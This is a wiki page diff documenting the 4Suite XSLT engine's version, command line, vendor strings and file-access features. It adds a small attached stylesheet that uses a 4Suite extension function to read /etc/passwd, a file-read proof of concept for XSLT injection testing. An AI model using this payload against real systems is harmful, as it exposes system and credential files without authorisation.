Changes for page Engine_4Suite

Last modified by Nicolas Gregoire on 2012/01/23 12:24

From version Icon 7.1 Icon
edited by Nicolas Gregoire
on 2012/01/11 11:50
Change comment: There is no comment for this version
To version Icon 9.1 Icon
edited by Nicolas Gregoire
on 2012/01/23 12:29
Change comment: Upload new attachment 4suitereadfile.xsl

Summary

Details

Icon Page properties
Content
... ... @@ -1,23 +1,31 @@
1 -[[4Suite>>http://foursuite.sourceforge.net/||rel="__blank" title="4Suite Home Page"]] is a Python based XSLT engine by Fourthought Inc.
1 +{{toc/}}
2 2  
3 += Introduction =
3 3  
4 -== Supported version ==
5 +[[4Suite>>http://foursuite.sourceforge.net/||rel="__blank" title="4Suite Home Page"]] is a Python based XSLT engine by Fourthought Inc.
5 5  
7 += Supported version =
6 6  
7 7  1.0
8 8  
11 += Command line =
9 9  
10 -== Command line ==
11 -
12 12  $> 4xslt foo.xml foo.xsl
13 13  
15 += Identification strings =
14 14  
15 -== Identification strings ==
16 -
17 17  |=xsl:vendor-url|http:~/~/4Suite.org
18 18  |=xsl:vendor|Fourthought Inc.
19 19  |=xsl:version|1
20 20  
21 -== Special features ==
21 += Special features =
22 22  
23 23  * File access (read and write)
24 +
25 += Reading files =
26 +
27 +{{warning}}TODO{{/warning}}
28 +
29 += Writing files =
30 +
31 +{{warning}}TODO{{/warning}}
Icon 4suitereadfile.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +277 bytes
Content
... ... @@ -1,0 +1,11 @@
1 +<xsl:stylesheet
2 + version="1.0"
3 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
4 + xmlns:f="http://xmlns.4suite.org/ext" >
5 +
6 +<xsl:output method="text"/>
7 +<xsl:template match="/">
8 + <xsl:value-of select="f:doc-as-string('/etc/passwd', 'ascii')" />
9 +</xsl:template>
10 +</xsl:stylesheet>
11 +